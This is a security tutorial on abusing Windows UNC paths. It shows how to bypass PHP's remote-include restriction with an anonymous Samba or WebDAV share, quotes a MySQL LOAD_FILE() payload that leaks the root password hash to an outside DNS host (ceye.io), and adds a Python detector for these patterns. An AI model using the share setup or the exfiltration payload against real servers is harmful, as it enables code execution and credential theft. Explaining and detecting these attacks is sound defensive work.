The Microsoft Windows UNC
The Microsoft Windows UNC, short for Universal Naming Convention or Uniform Naming Convention, specifies a common syntax to describe the location of a network resource, such as a shared file, directory, or printer. The UNC syntax for Windows systems has the generic form:
Some Microsoft Windows interfaces also allow or require UNC syntax for WebDAV share access, rather than a URL. The UNC syntax is extended with optional components to denote use of SSL and TCP/IP port number, a WebDAV URL of
Vul1: Exploiting RFI in PHP Bypass Remote URL Inclusion Restriction
A few days ago there was an article on Twitter about exploiting remote file inclusion (RFI) in a PHP application and bypassing the remote URL inclusion restriction. This is a perfect trick.
In the PHP configuration file, the allow_url_include setting is "Off" by default, which instructs PHP not to load remote HTTP or FTP URLs and so prevents remote file inclusion attacks. However, PHP does not block loading from an SMB (UNC) path even when both "allow_url_include" and "allow_url_fopen" are set to "Off", because on Windows a UNC path is treated as a local file path rather than a URL.
This trick exploits Windows UNC’s characteristics. Attack chain:
In addition to SMB, a WebDAV share that requires no authentication can also be used.
Configuring the Samba server with anonymous read access (Linux machine).
In Kali Linux, install Samba with the following command:
apt-get install samba
Create the SMB share directory:
Configure permissions on the newly created SMB share directory:
chmod 0555 /var/www/html/pub/
chown -R nobody:nogroup /var/www/html/pub/
Run the following command to remove the default contents of the Samba server config file:
echo > /etc/samba/smb.conf
Put the following content in the file:
[global]
workgroup = WORKGROUP
server string = Samba Server %v
netbios name = indishell-lab
security = user
map to guest = bad user
name resolve order = bcast host
dns proxy = no
bind interfaces only = yes

[ethan]
path = /var/www/html/pub
writable = no
guest ok = yes
guest only = yes
read only = yes
directory mode = 0555
force user = nobody
Now restart the Samba server to apply the new configuration specified in the config file:
service smbd restart
Once the Samba server has restarted successfully, try to access the SMB share and make sure the server is not asking for credentials:
Start a WebDAV service with Docker:
Use https://github.com/BytemarkHosting/docker-webdav. Just put the result file in
/root/WebDAV/data; however, a username and password are required. :(
docker run -v /root/webdav:/var/lib/dav -e USERNAME=admin -e PASSWORD=admin -p 8000:80 --rm --name webdav bytemark/webdav
docker run --name=webdav -d -v /root/webdav:/webdav -p 8000:80 idelsink/webdav
The WebDAV client in Windows relies on the WebClient service (present by default). If you want to access the WebDAV service through a UNC path, you have to start that service first.
Note: the Windows WebClient converts the requested WebDAV path to uppercase, while Apache matches paths case-sensitively by default. This was discovered from the log file: the uppercased path is rejected outright and a 403 is returned.
You can work around this by using purely numeric directory and file names, since digits have no case.
Vul2: MySQL OOB Injection
Out-of-band injection uses an alternative channel to extract data from the server: HTTP(S) requests, DNS resolutions, file system access, e-mail, etc., depending on the functionality of the back-end technology.
From the payloads provided by CEYE, it can be seen that OOB injection is very well researched for MSSQL and Oracle, but for MySQL and PostgreSQL it is limited. The payload provided by CEYE for MySQL is:
SELECT LOAD_FILE(CONCAT('\\\\',(SELECT password FROM mysql.user WHERE user='root' LIMIT 1),'.mysql.ip.port.b182oj.ceye.io\\abc'));
You can see that there are a lot of backslashes: MySQL string literals use the backslash as an escape character, so '\\\\' is parsed as the two-character UNC prefix \\ and '\\abc' as \abc.
Note: this also relies on the Windows UNC path resolution behaviour described above; the server resolves the hostname built into the path, which is the out-of-band channel.
This option sets the secure_file_priv system variable, which is used to limit the effect of data import and export operations, such as those performed by the LOAD DATA and SELECT ... INTO OUTFILE statements and the LOAD_FILE() function. Refer to the link: https://dev.mysql.com/doc/refman/5.7/en/server-options.html

| Property | Value |
|---|---|
| Command-Line Format | --secure-file-priv=dir_name |
| System Variable | secure_file_priv |
| Default Value (>= 5.7.6) | platform specific |
| Default Value (<= 5.7.5) | empty string |
| Valid Values (>= 5.7.6) | empty string, dirname, NULL |
| Valid Values (<= 5.7.5) | empty string, dirname |
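Both tricks on this page (the PHP include in Vul1 and the LOAD_FILE() payload in Vul2) share the same tell: a path that starts with \\ or // and names a remote host. The Python script below is an added example, not code from the article, from CEYE, or from any tool the article mentions. It parses the UNC forms the article describes (plain \\host\share, the forward-slash form, and the @SSL@port WebDAV extension), flags them in values of a PHP include parameter and in MySQL statements, and interprets secure_file_priv values with the semantics of the table above (NULL disables the file operations, an empty string leaves them unrestricted, a directory confines them). The hosts, share names, parameter values and the SQL sample are constructed placeholders.

```python
import re
from dataclasses import dataclass
from typing import Optional
from urllib.parse import unquote

# Added example (hypothetical detector, not from the article or any named tool).
# UNC forms it recognises:
#   \\host\share\path           SMB (Windows falls back to WebDAV if SMB fails)
#   \\host@SSL@8000\share\path  WebDAV with TLS and port (Windows UNC extension)
#   //host/share/path           forward-slash form that PHP on Windows also accepts
# The lookbehind keeps "http://host/..." from matching: that is a URL, which
# allow_url_include already governs, not a UNC path.
UNC_RE = re.compile(
    r"(?<!:)(?:\\\\|//)"              # leading \\ or //
    r"(?P<host>[A-Za-z0-9._-]+)"      # server name or address
    r"(?P<ssl>@SSL)?"                 # optional WebDAV TLS marker
    r"(?:@(?P<port>\d{1,5}))?"        # optional WebDAV port
    r"[\\/]"
    r"(?P<share>[^\\/\s'\"]+)"        # share name
)


@dataclass
class UncRef:
    host: str
    share: str
    port: Optional[int]
    tls: bool

    @property
    def transport(self) -> str:
        # @SSL or an explicit port exist only in the WebDAV extension of UNC;
        # a bare \\host\share is tried over SMB first, then WebDAV.
        return "webdav" if self.tls or self.port is not None else "smb-or-webdav"


def parse_unc(value: str) -> Optional[UncRef]:
    """Return the UNC reference embedded in an include parameter value, or None.
    The value is URL-decoded first because it normally arrives in a query string."""
    m = UNC_RE.search(unquote(value))
    if m is None:
        return None
    return UncRef(
        host=m.group("host"),
        share=m.group("share"),
        port=int(m.group("port")) if m.group("port") else None,
        tls=m.group("ssl") is not None,
    )


def audit_include_values(values) -> dict:
    """Map every parameter value that references a UNC path to its parsed form."""
    hits = {}
    for value in values:
        ref = parse_unc(value)
        if ref is not None:
            hits[value] = ref
    return hits


SQL_STRING_RE = re.compile(r"'((?:[^'\\]|\\.)*)'")   # single-quoted literal with escapes
LOAD_FILE_RE = re.compile(r"LOAD_FILE\s*\(", re.IGNORECASE)


def mysql_unescape(literal: str) -> str:
    # MySQL uses backslash as the escape character in string literals, so the
    # article's '\\\\' is the two-character UNC prefix \\ once the server parses it.
    return literal.replace("\\\\", "\\")


def unc_literals(sql: str) -> list:
    """All string literals in the statement that begin with a UNC prefix."""
    return [
        text
        for text in (mysql_unescape(m.group(1)) for m in SQL_STRING_RE.finditer(sql))
        if text.startswith("\\\\") or text.startswith("//")
    ]


def is_oob_load_file(sql: str) -> bool:
    """True when LOAD_FILE() is handed a UNC prefix: on a Windows server this makes
    MySQL resolve the hostname built into the path, i.e. an out-of-band channel."""
    return bool(LOAD_FILE_RE.search(sql)) and bool(unc_literals(sql))


def secure_file_priv_posture(value: Optional[str]) -> str:
    """Interpret a secure_file_priv value: NULL disables LOAD_FILE()/LOAD DATA/
    INTO OUTFILE, '' leaves them unrestricted, a directory confines them to that
    directory (so a UNC path outside it is refused)."""
    if value is None or value.strip().upper() == "NULL":
        return "disabled"
    if value.strip() == "":
        return "unrestricted"
    return "restricted"


# Constructed samples (not real traffic): values of a PHP "page" parameter and a
# statement modelled on the article's payload with a placeholder domain.
SAMPLE_INCLUDE_VALUES = [
    "about.php",
    "../../etc/passwd",                          # traversal, not UNC: out of scope here
    r"\\203.0.113.5\ethan\file.txt",
    "%5C%5C203.0.113.5%40SSL%408000%5C1%5C2",   # URL-encoded \\host@SSL@8000\1\2
    "//203.0.113.5/ethan/file.txt",
    "http://203.0.113.5/file.txt",               # URL, governed by allow_url_include
]
SAMPLE_SQL = (
    r"SELECT LOAD_FILE(CONCAT('\\\\',(SELECT password FROM mysql.user "
    r"WHERE user='root' LIMIT 1),'.example.invalid\\abc'))"
)

if __name__ == "__main__":
    for value, ref in audit_include_values(SAMPLE_INCLUDE_VALUES).items():
        print(f"UNC include: {value!r} -> host={ref.host} share={ref.share} via {ref.transport}")
    print("OOB LOAD_FILE:", is_oob_load_file(SAMPLE_SQL), unc_literals(SAMPLE_SQL))
    for setting in ("NULL", "", "/var/lib/mysql-files/"):
        print(f"secure_file_priv={setting!r}: {secure_file_priv_posture(setting)}")
```

Run as-is, the script reports the three UNC-bearing include values with the host and share they would reach, confirms that the LOAD_FILE() statement carries a UNC prefix, and shows that only secure_file_priv=NULL (or a confining directory) closes the LOAD_FILE() channel; the same functions can be pointed at a PHP application's access log parameters or a MySQL general log instead of the constructed samples.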